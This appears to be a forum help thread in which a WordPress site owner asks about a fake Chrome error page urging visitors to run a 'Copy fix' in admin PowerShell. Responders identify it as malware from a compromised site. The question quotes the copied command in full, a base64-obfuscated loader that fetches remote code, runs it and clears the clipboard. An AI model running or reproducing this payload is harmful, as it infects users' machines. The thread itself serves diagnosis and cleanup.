Google Chrome Error: 'Something went wrong while displaying this webpage' on Desktop Browsers

I'm encountering an issue with my website altaiyeb.com when accessed through Google Chrome on desktop. The error message displayed is:

Something went wrong while displaying this webpage.
There was an error during the latest update of browser version, causing some web pages to malfunction.
Follow these instructions to resolve the issue:

Click the 'Copy fix' button below.
Right-click on the Windows icon.
Select 'Windows PowerShell (Admin)'.
Right-click within the open terminal window.
Wait for the update to complete, then refresh the page.


I've tried following the provided steps, but the issue persists. Here are some additional details:

The website works perfectly on mobile browsers.
The issue is specific to desktop browsers.
I've cleared the cache, disabled extensions, and ensured the browser is up to date.

Steps Taken:

Cleared browser cache and cookies.
Disabled all browser extensions.
Tried accessing the website in Incognito mode.
Updated Google Chrome to the latest version.
Reinstalled Google Chrome.
Checked for conflicting software.
Tested the website on different desktop browsers (Firefox, Edge).

Observations:

The issue is consistent across different desktop browsers.
No problems are encountered on mobile browsers.
Console logs indicate multiple SyntaxError issues related to JSON parsing.

Code Snippet (if applicable):
console.log('Data before parsing:', data);
try {
    let parsedData = JSON.parse(data);
    console.log('Parsed Data:', parsedData);
} catch (error) {
    console.error('Error parsing JSON:', error, 'Data:', data);
}

Any insights or suggestions on how to resolve this error would be greatly appreciated. Thank you!
And When I click on Copy Fix:
            ipconfig /flushdns
            $Data = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JGc5MUYgPSAnaHR0cHM6Ly9nYW1lLmVtaWxpZWJvdWNoZXIuZnIvY29udGVudC9maXguaHRtbCcKJHYzOEsgPSBAeyAnVXNlci1BZ2VudCcgPSAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwMi4wLjAuMCBTYWZhcmkvNTM3LjM2JyB9CiR6MDRRID0gSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkZzkxRiAtVXNlQmFzaWNQYXJzaW5nIC1IZWFkZXJzICR2MzhLCiRjb250ZW50ID0gJHowNFEuQ29udGVudApJRVggJGNvbnRlbnQKY2xlYXItaG9zdAo="))); 
            $DUMP = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw=="))); 
            $LIC = $Data + "; " + $DUMP; 
            Invoke-Expression $LIC; 
            exit;


That is not a normal error message, and the fact that it's asking you to run something in powershell makes me think you're dealing with malware of some sort.   What ends up on your clipboard after you hit the "Copy fix' button?  Don't paste it into a shell until you're certain what it does.

Does this answer your question? "Something went wrong" in Firefox, asks me to "Copy Fix"

The problem is that I can't post an comment for that text after clicking on Copy fix because it reaching the characters limit.

I'm going to update the question in that I'll paste it, please recheck it @DanielBeck

Yeah, this is 100% malware.  Your website is compromised, and if you've pasted that stuff into the shell already then so is your personal machine.

So now what to do how I can fix this please can you help?

I have tried multiple time to fix it, in my machine.

You're going to need to run a virus scanner on your personal machine.  For your website, if you look at the network tab you'll see it's making a call to https://x99y.xyz/endpoint -- at minimum you'll need to look through your code to see where that's coming from and disable it, but the fact that that got injected in the first place means you have some security problems in your wordpress install.

Hey, Thank you @DanielBeck I got it fixed I have to delete some plugin and installed one security plugin, thanks for helping.

You should also check your computer, there's a high chance it's been infected with a virus / malware @MohammedVardawala

Also I'm facing same issue but i got solution.
I'm using Wordpress and I have plugging "googlerank" I just remove ploughing and purge all chache and my issue Is solve.
You can also try deactive plugin one by one and check.

Yes, I have done the same thing and now it's good to go, thanks for replying.
